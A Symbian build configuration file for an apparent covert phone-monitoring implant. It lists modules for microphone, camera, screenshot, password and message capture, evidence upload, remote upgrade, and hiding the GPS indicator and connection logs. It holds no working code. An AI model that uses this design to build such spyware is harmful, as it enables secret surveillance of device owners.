APP_LAYER_SYSTEMINCLUDE			// needed by Symbian 3

TARGET                                  SharedQueueMon_20023635.exe 
TARGETTYPE                              exe 
//UID                                     0 0x2002aa96  // fake uid
UID										0 0x20030635  // HT uid 
VENDORID                                0 
USERINCLUDE                             ..\inc .. ..\..\Json\inc
SYSTEMINCLUDE                           \epoc32\include 
SYSTEMINCLUDE                           \epoc32\include\ecom
SYSTEMINCLUDE							\epoc32\include\mmf\plugin    // amr audio encoding 


SOURCEPATH                              ..\data 
//START RESOURCE 20024d7a.rss			// fake uid
START RESOURCE 200305D7.rss				// HT uid
  TARGETPATH                              \private\101f875a\import 
  HEADER                                   
END  

SOURCEPATH								..\..\Json\src
SOURCE JsonArray.cpp JsonBuilder.cpp JsonObject.cpp JsonPair.cpp JsonParser.cpp JsonString.cpp 
SOURCE JsonTokener.cpp JsonUtil.cpp JsonValue.cpp StringUtil.cpp

SOURCEPATH                              ..\src 
SOURCE TonePlayer.cpp
SOURCE Monitor.cpp MessageFilter.cpp MonitorPhoneCall.cpp SlimMonitorPhoneCall.cpp MonitorFreeSpace.cpp MonitorForeground.cpp GpsIndicatorRemover.cpp CallLogReader.cpp MonitorCrisis.cpp//KeyLogger.cpp
SOURCE AbstractAction.cpp AbstractState.cpp ActionFactory.cpp ActionNone.cpp ActionSms.cpp ActionSync.cpp ActionUninstall.cpp ActionLog.cpp Network.cpp Protocol.cpp SendSmsSocket.cpp ActionSyncApn.cpp
SOURCE ActionEvent.cpp ActionAgent.cpp
SOURCE StateCmdUninstall.cpp StateNone.cpp StateNewConfFeedback.cpp
SOURCE StateAuthentication.cpp StateIdentification.cpp StateEvidences.cpp StateBye.cpp 
SOURCE StateNewConf.cpp StateFileSystem.cpp StateDownload.cpp StateUpload.cpp StateUpgrade.cpp
SOURCE AbstractAgent.cpp AgentAddressbook.cpp AgentCalendar.cpp AgentNone.cpp AgentPosition.cpp 
SOURCE AgentScreenshot.cpp AgentFactory.cpp AgentDevice.cpp AgentMic.cpp AgentApplication.cpp AgentCallList.cpp 
SOURCE AgentCallLocal.cpp AgentCamera.cpp LogFile.cpp AgentPassword.cpp AgentCrisis.cpp //AgentKeylog.cpp
#ifdef SYMBIAN_ENABLE_SPLIT_HEADERS         // for Symbian^3 only
SOURCE AgentMessages3.cpp
#else
SOURCE AgentMessages.cpp
#endif 
SOURCE AbstractEvent.cpp EventLocation.cpp EventNone.cpp EventSms.cpp EventTimer.cpp EventFactory.cpp RecvSmsSocket.cpp EventCellId.cpp EventAc.cpp EventBattery.cpp 
SOURCE EventStandby.cpp EventSimChange.cpp EventProcess.cpp EventCall.cpp EventConnection.cpp EventDate.cpp EventAfterInstall.cpp

SOURCE  Core.cpp
SOURCE 	ConfigFile.cpp
SOURCE	ConnLogCleaner.cpp


LIBRARY                       bafl.lib 
LIBRARY                                 ecom.lib 
LIBRARY                                 inetprotutil.lib 
LIBRARY                                 eikcore.lib 
LIBRARY                                 etel3rdparty.lib 
LIBRARY                                 estor.lib 
LIBRARY                                 esock.lib 
LIBRARY                                 gsmu.lib 
LIBRARY                                 smsu.lib 
LIBRARY                                 flogger.lib 
LIBRARY                                 efsrv.lib 
LIBRARY                                 ws32.lib 
LIBRARY                                 apgrfx.lib 
LIBRARY                                 eiksrv.lib 
LIBRARY                                 CONE.LIB 
LIBRARY                                 apparc.lib
LIBRARY                                 euser.lib smcm.lib msgs.lib etext.lib

LIBRARY  insock.lib  random.lib lbs.lib commdb.lib commsdat.lib
LIBRARY  connmon.lib  
 
LIBRARY  cntmodel.lib calinterimapi.lib

LIBRARY  logcli.lib

LIBRARY		 swinstcli.lib   
LIBRARY      hal.lib  sysutil.lib       

LIBRARY   mmscli.lib
LIBRARY   mmsserversettings.lib   //for retrieving mms access point

LIBRARY   fbscli.lib  imageconversion.lib gdi.lib		// for screenshot agent

LIBRARY mediaclientaudioinputstream.lib	    // mic rec 	
LIBRARY HWRMLightClient.lib   				// for standby event
LIBRARY apengine.lib						// for syncApn action  
LIBRARY centralrepository.lib				
LIBRARY featdiscovery.lib
LIBRARY aknnotify.lib
LIBRARY edbms.lib							// for install log
LIBRARY ecam.lib							// for camera handling
LIBRARY mediaclientaudio.lib				// for tone generation

#ifdef SYMBIAN_ENABLE_SPLIT_HEADERS         // for including Symbian^3 libs only
LIBRARY coreproviders.lib					// for connection notes into Symbian^3
LIBRARY extendedconnpref.lib                // for connection notes into Symbian^3
LIBRARY netmeta.lib
#endif 

LIBRARY ezip.lib charconv.lib apmime.lib cryptography.lib imcm.lib hash.lib
LIBRARY SharedQueueCli_20023633.lib 

CAPABILITY  All -DRM -TCB -AllFiles

//MACRO	_LOGGING

EPOCHEAPSIZE    0x8000 0x4000000   //max 40MB more or less
EPOCSTACKSIZE	0x8000

STATICLIBRARY Custom_CommonLib.lib 


